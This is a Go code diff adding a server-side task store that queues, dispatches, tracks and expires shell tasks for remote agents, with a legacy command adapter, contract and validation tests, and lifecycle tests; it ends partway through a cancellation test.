+package tasks
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+)
+
+func TestGoldenContractExamplesRoundTrip(t *testing.T) {
+	tests := []struct {
+		name     string
+		file     string
+		new      func() interface{}
+		validate func(interface{}) error
+		required []string
+	}{
+		{
+			name: "create request",
+			file: "task-create-request-v1.json",
+			new:  func() interface{} { return &CreateRequest{} },
+			validate: func(value interface{}) error {
+				return value.(*CreateRequest).validate()
+			},
+			required: []string{"schema_version", "type", "arguments", "timeout_seconds", "expires_in_seconds"},
+		},
+		{
+			name:     "queued task",
+			file:     "task-v1.json",
+			new:      func() interface{} { return &Task{} },
+			required: []string{"schema_version", "id", "agent_id", "type", "arguments", "timeout_seconds", "status", "created_at", "queued_at", "expires_at"},
+		},
+		{
+			name:     "dispatched task",
+			file:     "task-dispatched-v1.json",
+			new:      func() interface{} { return &Task{} },
+			required: []string{"schema_version", "id", "agent_id", "type", "arguments", "timeout_seconds", "status", "created_at", "queued_at", "dispatched_at", "expires_at"},
+		},
+		{
+			name: "completed result",
+			file: "task-result-v1.json",
+			new:  func() interface{} { return &Result{} },
+			validate: func(value interface{}) error {
+				result := value.(*Result)
+				return result.validate(result.AgentID)
+			},
+			required: []string{"schema_version", "task_id", "agent_id", "outcome", "started_at", "completed_at", "exit_code", "output"},
+		},
+		{
+			name: "failed result",
+			file: "task-result-failed-v1.json",
+			new:  func() interface{} { return &Result{} },
+			validate: func(value interface{}) error {
+				result := value.(*Result)
+				return result.validate(result.AgentID)
+			},
+			required: []string{"schema_version", "task_id", "agent_id", "outcome", "started_at", "completed_at", "exit_code", "output", "error"},
+		},
+		{
+			name: "status update",
+			file: "task-status-update-v1.json",
+			new:  func() interface{} { return &StatusUpdate{} },
+			validate: func(value interface{}) error {
+				update := value.(*StatusUpdate)
+				return update.validate(update.AgentID, update.TaskID)
+			},
+			required: []string{"schema_version", "task_id", "agent_id", "status", "timestamp"},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			path := filepath.Join("..", "..", "..", "docs", "schemas", "examples", tt.file)
+			data, err := os.ReadFile(path)
+			if err != nil {
+				t.Fatalf("read golden example: %v", err)
+			}
+			value := tt.new()
+			if err := json.Unmarshal(data, value); err != nil {
+				t.Fatalf("decode golden example: %v", err)
+			}
+			if tt.validate != nil {
+				if err := tt.validate(value); err != nil {
+					t.Fatalf("validate golden example: %v", err)
+				}
+			}
+			roundTrip, err := json.Marshal(value)
+			if err != nil {
+				t.Fatalf("encode golden example: %v", err)
+			}
+			var fields map[string]interface{}
+			if err := json.Unmarshal(roundTrip, &fields); err != nil {
+				t.Fatalf("decode round trip: %v", err)
+			}
+			for _, required := range tt.required {
+				if _, ok := fields[required]; !ok {
+					t.Fatalf("round trip omitted required field %q: %s", required, roundTrip)
+				}
+			}
+		})
+	}
+}
+
+func TestResultJSONRequiresCompleteOutputObject(t *testing.T) {
+	tests := []string{
+		`{"schema_version":1,"task_id":"task-one","agent_id":"agent-one","outcome":"completed","started_at":"2026-07-23T16:30:05Z","completed_at":"2026-07-23T16:30:06Z"}`,
+		`{"schema_version":1,"task_id":"task-one","agent_id":"agent-one","outcome":"completed","started_at":"2026-07-23T16:30:05Z","completed_at":"2026-07-23T16:30:06Z","output":{"stderr":""}}`,
+		`{"schema_version":1,"task_id":"task-one","agent_id":"agent-one","outcome":"completed","started_at":"2026-07-23T16:30:05Z","completed_at":"2026-07-23T16:30:06Z","output":{"stdout":""}}`,
+		`{"schema_version":1,"task_id":"task-one","agent_id":"agent-one","outcome":"completed","started_at":"2026-07-23T16:30:05Z","completed_at":"2026-07-23T16:30:06Z","output":{"stdout":"","stderr":"","extra":true}}`,
+	}
+	for _, input := range tests {
+		var result Result
+		if err := json.Unmarshal([]byte(input), &result); err == nil {
+			t.Fatalf("expected invalid result JSON to fail: %s", input)
+		}
+	}
+}
+
+func TestCompletedResultRejectsExplicitEmptyError(t *testing.T) {
+	const withoutError = `{"schema_version":1,"task_id":"task-one","agent_id":"agent-one","outcome":"completed","started_at":"2026-07-23T16:30:05Z","completed_at":"2026-07-23T16:30:06Z","exit_code":0,"output":{"stdout":"","stderr":""}}`
+	const withEmptyError = `{"schema_version":1,"task_id":"task-one","agent_id":"agent-one","outcome":"completed","started_at":"2026-07-23T16:30:05Z","completed_at":"2026-07-23T16:30:06Z","exit_code":0,"output":{"stdout":"","stderr":""},"error":""}`
+
+	var omitted Result
+	if err := json.Unmarshal([]byte(withoutError), &omitted); err != nil {
+		t.Fatalf("decode completed result without error: %v", err)
+	}
+	if err := omitted.validate(omitted.AgentID); err != nil {
+		t.Fatalf("completed result with omitted error must be valid: %v", err)
+	}
+
+	var explicit Result
+	if err := json.Unmarshal([]byte(withEmptyError), &explicit); err != nil {
+		t.Fatalf("decode completed result with explicit empty error: %v", err)
+	}
+	if !explicit.errorPresent {
+		t.Fatal("completed result did not retain explicit error-field presence")
+	}
+	if err := explicit.validate(explicit.AgentID); !IsValidationError(err) {
+		t.Fatalf("completed result with explicit empty error must be rejected, got %v", err)
+	}
+}
+
+func TestResultValidationEnforcesOutcomeCoherenceAndCharacterLimits(t *testing.T) {
+	startedAt := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	completedAt := startedAt.Add(time.Second)
+	zero := 0
+	one := 1
+	valid := Result{
+		SchemaVersion: SchemaVersion,
+		TaskID:        "task-one",
+		AgentID:       "agent-one",
+		Outcome:       OutcomeCompleted,
+		StartedAt:     startedAt,
+		CompletedAt:   completedAt,
+		ExitCode:      &zero,
+		Output:        Output{},
+	}
+	if err := valid.validate("agent-one"); err != nil {
+		t.Fatalf("valid completed result: %v", err)
+	}
+
+	tests := []Result{
+		{Outcome: OutcomeCompleted, ExitCode: nil, Error: "", Output: Output{}},
+		{Outcome: OutcomeCompleted, ExitCode: &one, Error: "", Output: Output{}},
+		{Outcome: OutcomeCompleted, ExitCode: &zero, Error: "unexpected", Output: Output{}},
+		{Outcome: OutcomeFailed, ExitCode: nil, Error: " ", Output: Output{}},
+	}
+	for i, changes := range tests {
+		candidate := valid
+		candidate.Outcome = changes.Outcome
+		candidate.ExitCode = changes.ExitCode
+		candidate.Error = changes.Error
+		if err := candidate.validate("agent-one"); !IsValidationError(err) {
+			t.Fatalf("case %d: expected outcome coherence error, got %v", i, err)
+		}
+	}
+
+	failedWithZero := valid
+	failedWithZero.Outcome = OutcomeFailed
+	failedWithZero.ExitCode = &zero
+	failedWithZero.Error = "capture failed"
+	if err := failedWithZero.validate("agent-one"); err != nil {
+		t.Fatalf("failed result may retain exit code zero for capture failures: %v", err)
+	}
+	for _, boundary := range []int{MinResultExitCode, MaxResultExitCode} {
+		candidate := failedWithZero
+		candidate.ExitCode = &boundary
+		if err := candidate.validate("agent-one"); err != nil {
+			t.Fatalf("boundary exit code %d must be valid: %v", boundary, err)
+		}
+	}
+	for _, outside := range []int{MinResultExitCode - 1, MaxResultExitCode + 1} {
+		candidate := failedWithZero
+		candidate.ExitCode = &outside
+		if err := candidate.validate("agent-one"); !IsValidationError(err) {
+			t.Fatalf("out-of-range exit code %d must be rejected, got %v", outside, err)
+		}
+	}
+
+	oversized := valid
+	oversized.Output.Stdout = strings.Repeat("界", MaxResultStreamCharacters+1)
+	if err := oversized.validate("agent-one"); !IsValidationError(err) {
+		t.Fatalf("expected oversized Unicode stdout error, got %v", err)
+	}
+	oversized = valid
+	oversized.Error = strings.Repeat("界", MaxResultErrorCharacters+1)
+	oversized.Outcome = OutcomeFailed
+	oversized.ExitCode = nil
+	if err := oversized.validate("agent-one"); !IsValidationError(err) {
+		t.Fatalf("expected oversized Unicode error field rejection, got %v", err)
+	}
+}
+
+func TestTaskResultBodyLimitCoversGoEscapedSchemaPayload(t *testing.T) {
+	exitCode := 1
+	result := Result{
+		SchemaVersion: SchemaVersion,
+		TaskID:        strings.Repeat("t", 128),
+		AgentID:       strings.Repeat("a", 128),
+		Outcome:       OutcomeFailed,
+		StartedAt:     time.Date(2026, 7, 23, 16, 30, 5, 0, time.UTC),
+		CompletedAt:   time.Date(2026, 7, 23, 16, 30, 6, 0, time.UTC),
+		ExitCode:      &exitCode,
+		Output: Output{
+			Stdout: strings.Repeat("\x00", MaxResultStreamCharacters),
+			Stderr: strings.Repeat("\x00", MaxResultStreamCharacters),
+		},
+		Error: strings.Repeat("\x00", MaxResultErrorCharacters),
+	}
+	if err := result.validate(result.AgentID); err != nil {
+		t.Fatalf("worst-case result must remain contract-valid: %v", err)
+	}
+
+	encoded, err := json.Marshal(result)
+	if err != nil {
+		t.Fatalf("marshal worst-case result: %v", err)
+	}
+	if len(encoded) > MaxTaskResultBodyBytes {
+		t.Fatalf(
+			"schema-valid result encodes to %d bytes, above body cap %d",
+			len(encoded),
+			MaxTaskResultBodyBytes,
+		)
+	}
+}
+
+func TestIdentifierValidationUsesCanonicalASCIIAlphabet(t *testing.T) {
+	for _, valid := range []string{"agent-AZ_09.:value", "task-one"} {
+		if err := ValidateIdentifier("id", valid); err != nil {
+			t.Fatalf("canonical identifier %q rejected: %v", valid, err)
+		}
+	}
+	for _, invalid := range []string{"agent/one", "agént", "agent one", "agent\none"} {
+		if err := ValidateIdentifier("id", invalid); !IsValidationError(err) {
+			t.Fatalf("non-canonical identifier %q accepted", invalid)
+		}
+	}
+}

--- a/server/internal/tasks/store.go
+++ b/server/internal/tasks/store.go
@@ -1,0 +1,582 @@
+package tasks
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+	"sync"
+	"time"
+	"unicode/utf8"
+
+	"github.com/google/uuid"
+)
+
+const DefaultDispatchLease = 30 * time.Second
+
+// CompletionInfo describes server-internal completion metadata that is not
+// part of the public task wire format.
+type CompletionInfo struct {
+	LegacyOrigin bool
+	Applied      bool
+}
+
+type Store struct {
+	mu               sync.RWMutex
+	byID             map[string]*Task
+	byAgent          map[string][]string
+	lastDispatch     map[string]time.Time
+	runningUpdates   map[string]StatusUpdate
+	legacyOrigin     map[string]bool
+	now              func() time.Time
+	dispatchLease    time.Duration
+	maxTasksPerAgent int
+}
+
+func NewStore() *Store {
+	return NewStoreWithClock(time.Now)
+}
+
+func NewStoreWithClock(now func() time.Time) *Store {
+	return newStoreWithOptions(now, DefaultDispatchLease, MaxTaskHistoryPerAgent)
+}
+
+func newStoreWithOptions(
+	now func() time.Time,
+	dispatchLease time.Duration,
+	maxTasksPerAgent int,
+) *Store {
+	if now == nil {
+		now = time.Now
+	}
+	if dispatchLease <= 0 {
+		dispatchLease = DefaultDispatchLease
+	}
+	if maxTasksPerAgent <= 0 {
+		maxTasksPerAgent = MaxTaskHistoryPerAgent
+	}
+	return &Store{
+		byID:             make(map[string]*Task),
+		byAgent:          make(map[string][]string),
+		lastDispatch:     make(map[string]time.Time),
+		runningUpdates:   make(map[string]StatusUpdate),
+		legacyOrigin:     make(map[string]bool),
+		now:              now,
+		dispatchLease:    dispatchLease,
+		maxTasksPerAgent: maxTasksPerAgent,
+	}
+}
+
+func (s *Store) Create(agentID string, request CreateRequest) (Task, error) {
+	return s.create(agentID, request, false)
+}
+
+func (s *Store) create(agentID string, request CreateRequest, legacyOrigin bool) (Task, error) {
+	if err := ValidateIdentifier("agent_id", agentID); err != nil {
+		return Task{}, err
+	}
+	if err := request.validate(); err != nil {
+		return Task{}, err
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	now := normalizeTime(s.now())
+	s.expireDispatchableLocked(agentID, now)
+	if err := s.makeTaskRoomLocked(agentID); err != nil {
+		return Task{}, err
+	}
+
+	expiresIn := DefaultExpiresIn
+	if request.ExpiresInSeconds != nil {
+		expiresIn = *request.ExpiresInSeconds
+	}
+	expiresAt := now.Add(time.Duration(expiresIn) * time.Second)
+	task := &Task{
+		SchemaVersion:  SchemaVersion,
+		ID:             uuid.NewString(),
+		AgentID:        agentID,
+		Type:           request.Type,
+		Arguments:      request.Arguments,
+		TimeoutSeconds: request.TimeoutSeconds,
+		Status:         StatusQueued,
+		CreatedAt:      now,
+		QueuedAt:       now,
+		ExpiresAt:      &expiresAt,
+	}
+
+	s.byID[task.ID] = task
+	s.byAgent[agentID] = append(s.byAgent[agentID], task.ID)
+	s.legacyOrigin[task.ID] = legacyOrigin
+	return cloneTask(task), nil
+}
+
+func (s *Store) CreateLegacyShell(agentID, command string) (Task, error) {
+	expiresIn := DefaultExpiresIn
+	return s.create(agentID, CreateRequest{
+		SchemaVersion:    SchemaVersion,
+		Type:             TypeShell,
+		Arguments:        ShellArguments{Command: command},
+		TimeoutSeconds:   DefaultTimeoutSeconds,
+		ExpiresInSeconds: &expiresIn,
+	}, true)
+}
+
+func (s *Store) List(agentID string) ([]Task, error) {
+	if err := ValidateIdentifier("agent_id", agentID); err != nil {
+		return nil, err
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	s.expireDispatchableLocked(agentID, normalizeTime(s.now()))
+
+	ids := s.byAgent[agentID]
+	out := make([]Task, 0, len(ids))
+	for _, id := range ids {
+		if task := s.byID[id]; task != nil {
+			out = append(out, cloneTask(task))
+		}
+	}
+	return out, nil
+}
+
+func (s *Store) Get(agentID, taskID string) (Task, error) {
+	if err := validateIDs(agentID, taskID); err != nil {
+		return Task{}, err
+	}
+
+	s.mu.RLock()
+	defer s.mu.RUnlock()
+	task, err := s.getLocked(agentID, taskID)
+	if err != nil {
+		return Task{}, err
+	}
+	return cloneTask(task), nil
+}
+
+func (s *Store) DispatchNext(agentID string) (Task, bool, error) {
+	return s.dispatchNext(agentID, false)
+}
+
+// DispatchNextLegacy returns only tasks created through a deprecated raw
+// command adapter. A legacy poll must never consume a typed-origin task because
+// it cannot preserve that task's ID or structured result contract.
+func (s *Store) DispatchNextLegacy(agentID string) (Task, bool, error) {
+	return s.dispatchNext(agentID, true)
+}
+
+func (s *Store) dispatchNext(agentID string, legacyOnly bool) (Task, bool, error) {
+	if err := ValidateIdentifier("agent_id", agentID); err != nil {
+		return Task{}, false, err
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	now := normalizeTime(s.now())
+	s.expireDispatchableLocked(agentID, now)
+
+	for _, id := range s.byAgent[agentID] {
+		task := s.byID[id]
+		if task == nil || task.Status != StatusDispatched || !s.matchesOriginLocked(id, legacyOnly) {
+			continue
+		}
+		lastDelivery := task.DispatchedAt
+		if last, ok := s.lastDispatch[id]; ok {
+			lastDelivery = &last
+		}
+		if lastDelivery != nil && now.Before(lastDelivery.Add(s.dispatchLease)) {
+			continue
+		}
+		s.lastDispatch[id] = now
+		return cloneTask(task), true, nil
+	}
+
+	for _, id := range s.byAgent[agentID] {
+		task := s.byID[id]
+		if task == nil || task.Status != StatusQueued || !s.matchesOriginLocked(id, legacyOnly) {
+			continue
+		}
+		if err := transition(task, StatusDispatched); err != nil {
+			return Task{}, false, err
+		}
+		task.DispatchedAt = timePointer(now)
+		s.lastDispatch[id] = now
+		return cloneTask(task), true, nil
+	}
+	return Task{}, false, nil
+}
+
+func (s *Store) MarkRunning(agentID, taskID string, update StatusUpdate) (Task, error) {
+	if err := validateIDs(agentID, taskID); err != nil {
+		return Task{}, err
+	}
+	if err := update.validate(agentID, taskID); err != nil {
+		return Task{}, err
+	}
+	update = normalizeStatusUpdate(update)
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	now := normalizeTime(s.now())
+	s.expireDispatchableLocked(agentID, now)
+	task, err := s.getLocked(agentID, taskID)
+	if err != nil {
+		return Task{}, err
+	}
+	if accepted, ok := s.runningUpdates[taskID]; ok {
+		if statusUpdatesEqual(accepted, update) {
+			return cloneTask(task), nil
+		}
+		return Task{}, fmt.Errorf("%w: conflicting repeated running update", ErrInvalidTransition)
+	}
+	if err := transition(task, StatusRunning); err != nil {
+		return Task{}, err
+	}
+	task.StartedAt = timePointer(now)
+	s.runningUpdates[taskID] = update
+	delete(s.lastDispatch, taskID)
+	return cloneTask(task), nil
+}
+
+func (s *Store) Complete(agentID string, result Result) (Task, error) {
+	task, _, err := s.CompleteWithInfo(agentID, result)
+	return task, err
+}
+
+func (s *Store) CompleteWithInfo(agentID string, result Result) (Task, CompletionInfo, error) {
+	if err := ValidateIdentifier("agent_id", agentID); err != nil {
+		return Task{}, CompletionInfo{}, err
+	}
+	result = normalizeResult(result)
+	if err := result.validate(agentID); err != nil {
+		return Task{}, CompletionInfo{}, err
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	task, err := s.getLocked(agentID, result.TaskID)
+	if err != nil {
+		return Task{}, CompletionInfo{}, err
+	}
+	info := CompletionInfo{LegacyOrigin: s.legacyOrigin[task.ID]}
+	targetStatus := StatusCompleted
+	if result.Outcome == OutcomeFailed {
+		targetStatus = StatusFailed
+	}
+	if task.Status == StatusCompleted || task.Status == StatusFailed {
+		if task.Result != nil && resultsEqual(*task.Result, result) {
+			return cloneTask(task), info, nil
+		}
+		return Task{}, CompletionInfo{}, fmt.Errorf(
+			"%w: conflicting repeated terminal result",
+			ErrInvalidTransition,
+		)
+	}
+	runningUpdate, ok := s.runningUpdates[task.ID]
+	if !ok {
+		return Task{}, CompletionInfo{}, fmt.Errorf(
+			"%w: task has no accepted running update",
+			ErrInvalidTransition,
+		)
+	}
+	if !result.StartedAt.Equal(runningUpdate.Timestamp) {
+		return Task{}, CompletionInfo{}, &ValidationError{
+			Field:   "started_at",
+			Message: "must match the running status timestamp",
+		}
+	}
+	if err := transition(task, targetStatus); err != nil {
+		return Task{}, CompletionInfo{}, err
+	}
+	completedAt := normalizeTime(s.now())
+	if task.StartedAt != nil && completedAt.Before(*task.StartedAt) {
+		completedAt = *task.StartedAt
+	}
+	task.CompletedAt = timePointer(completedAt)
+	task.Result = cloneResult(&result)
+	info.Applied = true
+	return cloneTask(task), info, nil
+}
+
+func (s *Store) Cancel(agentID, taskID string) (Task, error) {
+	if err := validateIDs(agentID, taskID); err != nil {
+		return Task{}, err
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	s.expireDispatchableLocked(agentID, normalizeTime(s.now()))
+	task, err := s.getLocked(agentID, taskID)
+	if err != nil {
+		return Task{}, err
+	}
+	if err := transition(task, StatusCancelled); err != nil {
+		return Task{}, err
+	}
+	now := s.now().UTC()
+	task.CompletedAt = timePointer(now)
+	return cloneTask(task), nil
+}
+
+// CompleteLegacy correlates a legacy command result to the oldest dispatched
+// shell task with the same command. It keeps the deprecated adapter useful
+// while all new agent traffic uses task IDs.
+func (s *Store) CompleteLegacy(agentID, command, output string) (Task, bool, error) {
+	if err := ValidateIdentifier("agent_id", agentID); err != nil {
+		return Task{}, false, err
+	}
+	if strings.TrimSpace(command) == "" {
+		return Task{}, false, &ValidationError{Field: "command", Message: "is required"}
+	}
+	if utf8.RuneCountInString(command) > MaxCommandCharacters {
+		return Task{}, false, &ValidationError{
+			Field:   "command",
+			Message: fmt.Sprintf("must be at most %d characters", MaxCommandCharacters),
+		}
+	}
+	if utf8.RuneCountInString(output) > MaxResultStreamCharacters {
+		return Task{}, false, &ValidationError{
+			Field:   "output",
+			Message: fmt.Sprintf("must be at most %d characters", MaxResultStreamCharacters),
+		}
+	}
+
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	now := normalizeTime(s.now())
+	s.expireDispatchableLocked(agentID, now)
+	var task *Task
+	for _, id := range s.byAgent[agentID] {
+		candidate := s.byID[id]
+		if candidate != nil &&
+			candidate.Status == StatusDispatched &&
+			s.legacyOrigin[id] &&
+			candidate.Type == TypeShell &&
+			candidate.Arguments.Command == command {
+			task = candidate
+			break
+		}
+	}
+	if task == nil {
+		return Task{}, false, nil
+	}
+
+	outcome := OutcomeCompleted
+	targetStatus := StatusCompleted
+	var resultError string
+	var exitCode *int
+	if strings.HasPrefix(strings.TrimSpace(output), "Error:") {
+		outcome = OutcomeFailed
+		targetStatus = StatusFailed
+		resultError = strings.TrimSpace(output)
+	} else {
+		code := 0
+		exitCode = &code
+	}
+	result := &Result{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       agentID,
+		Outcome:       outcome,
+		StartedAt:     now,
+		CompletedAt:   now,
+		ExitCode:      exitCode,
+		Output:        Output{Stdout: output, Stderr: ""},
+		Error:         resultError,
+	}
+	if err := result.validate(agentID); err != nil {
+		return Task{}, false, err
+	}
+	if err := transition(task, StatusRunning); err != nil {
+		return Task{}, false, err
+	}
+	task.StartedAt = timePointer(now)
+	if err := transition(task, targetStatus); err != nil {
+		return Task{}, false, err
+	}
+	task.CompletedAt = timePointer(now)
+	task.Result = result
+	delete(s.lastDispatch, task.ID)
+	return cloneTask(task), true, nil
+}
+
+func (s *Store) getLocked(agentID, taskID string) (*Task, error) {
+	task := s.byID[taskID]
+	if task == nil || task.AgentID != agentID {
+		return nil, ErrNotFound
+	}
+	return task, nil
+}
+
+func (s *Store) matchesOriginLocked(taskID string, legacyOnly bool) bool {
+	return !legacyOnly || s.legacyOrigin[taskID]
+}
+
+func (s *Store) expireDispatchableLocked(agentID string, now time.Time) {
+	for _, id := range s.byAgent[agentID] {
+		task := s.byID[id]
+		if task == nil ||
+			(task.Status != StatusQueued && task.Status != StatusDispatched) ||
+			task.ExpiresAt == nil ||
+			task.ExpiresAt.After(now) {
+			continue
+		}
+		if transition(task, StatusExpired) == nil {
+			task.CompletedAt = timePointer(now)
+			delete(s.lastDispatch, id)
+		}
+	}
+}
+
+func (s *Store) makeTaskRoomLocked(agentID string) error {
+	ids := s.byAgent[agentID]
+	if len(ids) < s.maxTasksPerAgent {
+		return nil
+	}
+
+	toRemove := len(ids) - s.maxTasksPerAgent + 1
+	retained := make([]string, 0, len(ids)-toRemove)
+	for _, id := range ids {
+		task := s.byID[id]
+		if toRemove > 0 && task != nil && isTerminal(task.Status) {
+			s.deleteTaskLocked(id)
+			toRemove--
+			continue
+		}
+		retained = append(retained, id)
+	}
+	s.byAgent[agentID] = retained
+	if toRemove > 0 {
+		return ErrCapacity
+	}
+	return nil
+}
+
+func (s *Store) deleteTaskLocked(taskID string) {
+	delete(s.byID, taskID)
+	delete(s.lastDispatch, taskID)
+	delete(s.runningUpdates, taskID)
+	delete(s.legacyOrigin, taskID)
+}
+
+func isTerminal(status Status) bool {
+	switch status {
+	case StatusCompleted, StatusFailed, StatusCancelled, StatusExpired:
+		return true
+	default:
+		return false
+	}
+}
+
+func transition(task *Task, next Status) error {
+	if !canTransition(task.Status, next) {
+		return fmt.Errorf("%w: %s -> %s", ErrInvalidTransition, task.Status, next)
+	}
+	task.Status = next
+	return nil
+}
+
+func validateIDs(agentID, taskID string) error {
+	if err := ValidateIdentifier("agent_id", agentID); err != nil {
+		return err
+	}
+	if err := ValidateIdentifier("task_id", taskID); err != nil {
+		return err
+	}
+	return nil
+}
+
+func IsValidationError(err error) bool {
+	var target *ValidationError
+	return errors.As(err, &target)
+}
+
+func normalizeStatusUpdate(update StatusUpdate) StatusUpdate {
+	update.Timestamp = normalizeTime(update.Timestamp)
+	return update
+}
+
+func normalizeResult(result Result) Result {
+	result.StartedAt = normalizeTime(result.StartedAt)
+	result.CompletedAt = normalizeTime(result.CompletedAt)
+	if result.ExitCode != nil {
+		exitCode := *result.ExitCode
+		result.ExitCode = &exitCode
+	}
+	return result
+}
+
+func normalizeTime(value time.Time) time.Time {
+	return value.UTC().Round(0)
+}
+
+func statusUpdatesEqual(left, right StatusUpdate) bool {
+	return left.SchemaVersion == right.SchemaVersion &&
+		left.TaskID == right.TaskID &&
+		left.AgentID == right.AgentID &&
+		left.Status == right.Status &&
+		left.Timestamp.Equal(right.Timestamp)
+}
+
+func resultsEqual(left, right Result) bool {
+	return left.SchemaVersion == right.SchemaVersion &&
+		left.TaskID == right.TaskID &&
+		left.AgentID == right.AgentID &&
+		left.Outcome == right.Outcome &&
+		left.StartedAt.Equal(right.StartedAt) &&
+		left.CompletedAt.Equal(right.CompletedAt) &&
+		exitCodesEqual(left.ExitCode, right.ExitCode) &&
+		left.Output == right.Output &&
+		left.Error == right.Error
+}
+
+func exitCodesEqual(left, right *int) bool {
+	switch {
+	case left == nil && right == nil:
+		return true
+	case left == nil || right == nil:
+		return false
+	default:
+		return *left == *right
+	}
+}
+
+func timePointer(value time.Time) *time.Time {
+	value = normalizeTime(value)
+	return &value
+}
+
+func cloneTask(task *Task) Task {
+	clone := *task
+	clone.DispatchedAt = cloneTime(task.DispatchedAt)
+	clone.StartedAt = cloneTime(task.StartedAt)
+	clone.CompletedAt = cloneTime(task.CompletedAt)
+	clone.ExpiresAt = cloneTime(task.ExpiresAt)
+	clone.Result = cloneResult(task.Result)
+	return clone
+}
+
+func cloneResult(result *Result) *Result {
+	if result == nil {
+		return nil
+	}
+	clone := *result
+	clone.ExitCode = cloneInt(result.ExitCode)
+	return &clone
+}
+
+func cloneInt(value *int) *int {
+	if value == nil {
+		return nil
+	}
+	clone := *value
+	return &clone
+}
+
+func cloneTime(value *time.Time) *time.Time {
+	if value == nil {
+		return nil
+	}
+	clone := *value
+	return &clone
+}

--- a/server/internal/tasks/store_test.go
+++ b/server/internal/tasks/store_test.go
@@ -1,0 +1,543 @@
+package tasks
+
+import (
+	"errors"
+	"strings"
+	"testing"
+	"time"
+)
+
+func TestStoreLifecycle(t *testing.T) {
+	now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	store := NewStoreWithClock(func() time.Time { return now })
+	expiresIn := 120
+
+	task, err := store.Create("agent-one", CreateRequest{
+		SchemaVersion:    SchemaVersion,
+		Type:             TypeShell,
+		Arguments:        ShellArguments{Command: "whoami"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+	if task.SchemaVersion != SchemaVersion || task.Status != StatusQueued {
+		t.Fatalf("unexpected created task: %#v", task)
+	}
+	if task.ExpiresAt == nil || !task.ExpiresAt.Equal(now.Add(120*time.Second)) {
+		t.Fatalf("unexpected expiry: %v", task.ExpiresAt)
+	}
+
+	now = now.Add(time.Second)
+	dispatched, ok, err := store.DispatchNext("agent-one")
+	if err != nil {
+		t.Fatalf("dispatch task: %v", err)
+	}
+	if !ok || dispatched.ID != task.ID || dispatched.Status != StatusDispatched {
+		t.Fatalf("unexpected dispatched task: %#v, ok=%t", dispatched, ok)
+	}
+
+	now = now.Add(time.Second)
+	running, err := store.MarkRunning("agent-one", task.ID, StatusUpdate{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       "agent-one",
+		Status:        StatusRunning,
+		Timestamp:     now,
+	})
+	if err != nil {
+		t.Fatalf("mark running: %v", err)
+	}
+	if running.Status != StatusRunning || running.StartedAt == nil {
+		t.Fatalf("unexpected running task: %#v", running)
+	}
+
+	now = now.Add(time.Second)
+	exitCode := 0
+	completed, err := store.Complete("agent-one", Result{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       "agent-one",
+		Outcome:       OutcomeCompleted,
+		StartedAt:     *running.StartedAt,
+		CompletedAt:   now,
+		ExitCode:      &exitCode,
+		Output:        Output{Stdout: "operator\n", Stderr: ""},
+	})
+	if err != nil {
+		t.Fatalf("complete task: %v", err)
+	}
+	if completed.Status != StatusCompleted || completed.Result == nil ||
+		completed.Result.Output.Stdout != "operator\n" {
+		t.Fatalf("unexpected completed task: %#v", completed)
+	}
+}
+
+func TestStoreRejectsInvalidTransitionsAndMismatchedIDs(t *testing.T) {
+	now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	store := NewStoreWithClock(func() time.Time { return now })
+	task, err := store.CreateLegacyShell("agent-one", "whoami")
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+
+	_, err = store.MarkRunning("agent-one", task.ID, StatusUpdate{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       "agent-one",
+		Status:        StatusRunning,
+		Timestamp:     now,
+	})
+	if !errors.Is(err, ErrInvalidTransition) {
+		t.Fatalf("expected queued -> running transition error, got %v", err)
+	}
+
+	_, _, err = store.DispatchNext("agent-one")
+	if err != nil {
+		t.Fatalf("dispatch task: %v", err)
+	}
+	_, err = store.MarkRunning("agent-one", task.ID, StatusUpdate{
+		SchemaVersion: SchemaVersion,
+		TaskID:        "different-task",
+		AgentID:       "agent-one",
+		Status:        StatusRunning,
+		Timestamp:     now,
+	})
+	if !IsValidationError(err) {
+		t.Fatalf("expected task ID validation error, got %v", err)
+	}
+}
+
+func TestStoreExpiresQueuedTasksBeforeDispatch(t *testing.T) {
+	now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	store := NewStoreWithClock(func() time.Time { return now })
+	expiresIn := 1
+	task, err := store.Create("agent-one", CreateRequest{
+		SchemaVersion:    SchemaVersion,
+		Type:             TypeShell,
+		Arguments:        ShellArguments{Command: "whoami"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+
+	now = now.Add(2 * time.Second)
+	if _, ok, err := store.DispatchNext("agent-one"); err != nil || ok {
+		t.Fatalf("expired task should not dispatch: ok=%t err=%v", ok, err)
+	}
+	expired, err := store.Get("agent-one", task.ID)
+	if err != nil {
+		t.Fatalf("get expired task: %v", err)
+	}
+	if expired.Status != StatusExpired || expired.CompletedAt == nil {
+		t.Fatalf("unexpected expired task: %#v", expired)
+	}
+}
+
+func TestStoreCancellationAndTerminalImmutability(t *testing.T) {
+	store := NewStore()
+	task, err := store.CreateLegacyShell("agent-one", "whoami")
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+	cancelled, err := store.Cancel("agent-one", task.ID)
+	if err != nil {
+		t.Fatalf("cancel task: %v", err)
+	}
